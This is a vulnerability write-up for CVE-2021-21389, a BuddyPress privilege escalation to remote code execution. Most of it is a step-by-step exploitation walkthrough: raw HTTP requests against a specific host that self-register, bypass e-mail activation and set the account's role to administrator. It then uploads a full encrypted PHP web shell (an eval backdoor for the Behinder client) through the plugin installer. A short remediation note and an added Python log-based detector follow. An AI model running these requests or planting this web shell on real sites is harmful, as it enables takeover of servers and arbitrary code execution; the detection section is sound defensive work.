WordPress BuddyPress privilege escalation to RCE (CVE-2021-21389): how the vulnerability works
1. About BuddyPress
BuddyPress is an open-source WordPress plugin for building community sites.
2. Vulnerability overview
In BuddyPress versions from 5.0.0 before 7.2.1, an unprivileged regular user can obtain administrator privileges by exploiting an issue in the REST API members endpoint. The vulnerability was fixed in BuddyPress 7.2.1; existing installations of the plugin should update to that version to mitigate the issue.
Affected versions: 5.0.0 < BuddyPress < 7.2.1
3. Exploitation steps
Visit the home page.

Construct the signup request:
POST /wp-json/buddypress/v1/signup HTTP/1.1
Host: 123.58.236.76:61756
User-Agent: python-requests/2.21.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 92

{"user_login": "test", "user_email": "11@qq.com", "user_name": "test", "password": "123456"}

Retrieve the activation_key and construct a request that bypasses the e-mail verification:
PUT /wp-json/buddypress/v1/signup/activate/ffX3IgFI12MUPXqIGnjyhr6RF4FEbfIB HTTP/1.1
Host: 123.58.236.76:61756
User-Agent: python-requests/2.21.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

Log in, create a new group, fill in the Details step, then keep clicking Next with the default values.

Take the cookie and the X-WP-Nonce from any request made after logging in and construct the privilege-escalation request:
POST /wp-json/buddypress/v1/members/me HTTP/1.1
Host: 123.58.236.76:61756
User-Agent: python-requests/2.21.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-WP-Nonce: cac9969872
Content-Type: application/json; charset=UTF-8
Cookie: cookie_token=6accb2d46ae3de4d7641c3b1d00a4ee28c3b73fa6abae106ed042f50c05b3334; _ga=GA1.1.1558654561.1649746835; wp-settings-time-1=1653380957; wp-settings-2=mfold%3Do; wp-settings-time-2=1654766164; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_046315ac7dac40047fae695770685470=test%7C1655001699%7Cg9Lk7ciLq6XlcC8bIvt76ANy7PkiOS9mzJJmE4xNpmy%7Ce8fe870813ecbde11f0c597a2302bd53b5734bd4ad148bba4fc587fb329207d5; wordpress_logged_in_a31bcdfdcc76ffd77224a3a00a13790b=test%7C1656040800%7C0MdnODFES0bwxkaHmqCj8M5Y99D1cXJbdhRPDrV5tq1%7Ce2c6b5b04fa53e83786afbcdbff33b416eac2d76c5c1fb20af0f692721622d0b; bp_new_group_id=2; bp_completed_create_steps=WyJncm91cC1kZXRhaWxzIiwiZ3JvdXAtc2V0dGluZ3MiXQ%3D%3D
Content-Length: 26

{"roles": "administrator"}

At this point we have administrator privileges, so we upload a shell through the plugin upload function:

POST /wp-admin/update.php?action=upload-plugin HTTP/1.1
Host: 123.58.236.76:61756
User-Agent: python-requests/2.21.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: wordpress_a31bcdfdcc76ffd77224a3a00a13790b=test11%7C1655003822%7CWywKqvlC1oZqbaxixPtj4ktkuQIZl28t1aSIzZWBRrz%7C59305b46ff0134f0dd8156dcf7759c8456e699e793df9b793461ea898ad26657; bp_completed_create_steps=WyJncm91cC1kZXRhaWxzIl0%3D; bp_new_group_id=1; wordpress_logged_in_a31bcdfdcc76ffd77224a3a00a13790b=test11%7C1655003822%7CWywKqvlC1oZqbaxixPtj4ktkuQIZl28t1aSIzZWBRrz%7C5bf446e62e7180b22e8c54d9f0585e54f85990591eed69df8c1a27ae68620e59; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-2=1654831030
Content-Length: 1068
Content-Type: multipart/form-data; boundary=96862129455fbf8aa742653c38c7d828

--96862129455fbf8aa742653c38c7d828
Content-Disposition: form-data; name="_wpnonce"

9274320095
--96862129455fbf8aa742653c38c7d828
Content-Disposition: form-data; name="pluginzip"; filename="test.php"
Content-Type: application/octet-stream

<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; // this key is the first 16 characters of the 32-character MD5 of the connection password; the default connection password is rebeyond
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl')) {
    $t="base64_"."decode";
    $post=$t($post."");
    for($i=0;$i<strlen($post);$i++) {
        $post[$i] = $post[$i]^$key[$i+1&15];
    }
} else {
    $post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>
--96862129455fbf8aa742653c38c7d828
Content-Disposition: form-data; name="install-plugin-submit"

Install Now
--96862129455fbf8aa742653c38c7d828--

Connect with Behinder (冰蝎):

4. Remediation
The vendor has released a new version; update to the latest version from the official site.
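Until the update is applied, the request sequence shown above is also easy to recognise in web-server logs. The following Python heuristic is an added example, not part of the original write-up: it correlates the four stages of the chain (self-signup, activation, a write to the members endpoint, a plugin upload) per client IP over constructed combined-format access-log lines. Access logs carry no request bodies, so it keys on the sequence and timing rather than on the `roles` parameter; stage names, the 30-minute window and the sample lines are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed combined-format access-log lines (sample data, not from a real server)
# reproducing the request sequence of the write-up, plus one unrelated client.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jun/2022:10:00:01 +0000] "POST /wp-json/buddypress/v1/signup HTTP/1.1" 200 312
203.0.113.5 - - [09/Jun/2022:10:00:09 +0000] "PUT /wp-json/buddypress/v1/signup/activate/ffX3IgFI12MUPXqIGnjyhr6RF4FEbfIB HTTP/1.1" 200 220
203.0.113.5 - - [09/Jun/2022:10:04:30 +0000] "POST /wp-json/buddypress/v1/members/me HTTP/1.1" 200 981
203.0.113.5 - - [09/Jun/2022:10:05:02 +0000] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 4501
198.51.100.7 - - [09/Jun/2022:10:02:00 +0000] "POST /wp-json/buddypress/v1/members/me HTTP/1.1" 200 981
"""
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# The four stages of the chain, in the order the write-up performs them (assumed names).
STAGES = [
    ("self_signup", "POST", re.compile(r"^/wp-json/buddypress/v1/signup/?$")),
    ("self_activate", "PUT", re.compile(r"^/wp-json/buddypress/v1/signup/activate/")),
    ("rest_self_update", "POST", re.compile(r"^/wp-json/buddypress/v1/members/(me|\d+)/?$")),
    ("plugin_upload", "POST", re.compile(r"^/wp-admin/update\.php\?action=upload-plugin")),
]

def classify(method, path):
    """Map one request to a chain stage, or None if it is not part of the chain."""
    return next((name for name, m, rx in STAGES if method == m and rx.match(path)), None)

def detect(log_text, window=timedelta(minutes=30)):
    """One alert per client IP that self-registers and then writes to the members endpoint
    within `window`; a later plugin upload by the same client raises the severity."""
    first_seen = defaultdict(dict)  # ip -> stage -> earliest successful timestamp
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        stage = m and classify(m["method"], m["path"])
        if not stage or not m["status"].startswith("2"):
            continue  # unparsable, off-chain or unsuccessful requests are ignored
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        stages = first_seen[m["ip"]]
        if stage not in stages or ts < stages[stage]:
            stages[stage] = ts
    alerts = []
    for ip, stages in first_seen.items():
        if ("self_signup" in stages and "rest_self_update" in stages
                and timedelta(0) <= stages["rest_self_update"] - stages["self_signup"] <= window):
            alerts.append({"ip": ip,
                           "severity": "critical" if "plugin_upload" in stages else "high",
                           "stages": sorted(stages, key=stages.get)})
    return alerts
```

A legitimate profile edit through `members/me` alone does not trigger the rule; only a freshly self-registered account writing to that endpoint does, which is the behaviour a patched site should never see from a non-admin account.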